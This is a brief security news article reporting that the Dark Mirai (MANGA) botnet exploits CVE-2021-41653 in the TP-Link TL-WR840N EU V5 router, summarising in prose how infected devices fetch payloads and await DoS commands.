Last Updated on 10/12/2021 by Nidhi Khandelwal
Dark Mirai (also known as MANGA) has been seen exploiting a new vulnerability on the TP-Link TL-WR840N EU V5, a popular low-cost home router released in 2017.
The weakness is identified as CVE-2021-41653, and it is caused by an insecure ‘host’ variable that can be exploited by an authenticated user to run commands on the device.
Threat actors exploited the vulnerability when the researcher who identified it published a proof of concept (PoC) exploit for the RCE.
According to Fortinet researchers who have been tracking Dark Mirai activity, the botnet added the RCE to its arsenal just two weeks after TP-Link released the firmware update.
Process of exploitation
The actors behind Dark Mirai use CVE-2021-41653 to induce devices to download and run a malicious script called “tshit.sh,” which then downloads the main binary payloads via two requests.
The actors must still authenticate in order for this attack to succeed, but if the user has left the device with default credentials, exploiting the vulnerability becomes straightforward.
MANGA, like normal Mirai, detects the architecture of the infected system and retrieves the appropriate payload.
Then, to prevent other botnets from gaining control of the captured device, it restricts connections to regularly targeted ports.
Finally, the virus awaits an order from the C&C (command and control) server to launch a denial-of-service (DoS) assault.
Mirai may be no longer active, but its code has spawned a slew of new botnets that are wreaking havoc on unprotected devices.
We just reported on the appearance of ‘Moobot,’ which was made possible by a command injection issue in Hikvision equipment.